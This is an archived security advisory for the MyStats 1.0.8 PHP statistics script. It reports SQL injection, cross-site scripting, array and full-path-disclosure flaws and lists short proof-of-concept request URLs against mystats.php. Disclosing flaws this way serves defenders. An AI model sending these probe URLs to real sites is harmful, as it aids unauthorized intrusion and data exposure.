AOH :: HP Unsorted M :: B06-5691.HTM

MyStats <=1.0.8



MyStats <=1.0.8
MyStats <=1.0.8



MyStats <=1.0.8 [injection sql, multiples xss, array & full path disclosure]
vendor site: http://emcity.nexenservices.com/mystats/index.php 
product :MyStats 1.0.8
bug: injection sql, multiples xss, array & full path disclosure
risk : medium

[1/3] Connexion Variable XSS

Exploits:

mystats/mystats.php?connexion=&by=jour&ORDERER=datetime
mystats/mystats.php?connexion="'/>&by=jour&ORDERER=datetime

[2/3] Details Variable Injection Sql, Full Path Disclosure, Array GET & XSS

Exploits:

mystats/mystats.php?details='
mystats/mystats.php?details[]mystats/mystats.php?details="'/>

[3/3] By Array GET & XSS

Exploit:

mystats/mystats.php?by[]=admin
mystats/mystats.php?connexion=2006-11-12&by="'/>&by=jour&ORDERER=datetime

[[ Security Access Point ]]

Gaffi=E9 Laurent & Moss=E9 Benjamin
http://s-a-p.ca/ 
http://209.190.3.234/benjamin-mosse/ 
contact: saps.audit@gmail.com 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.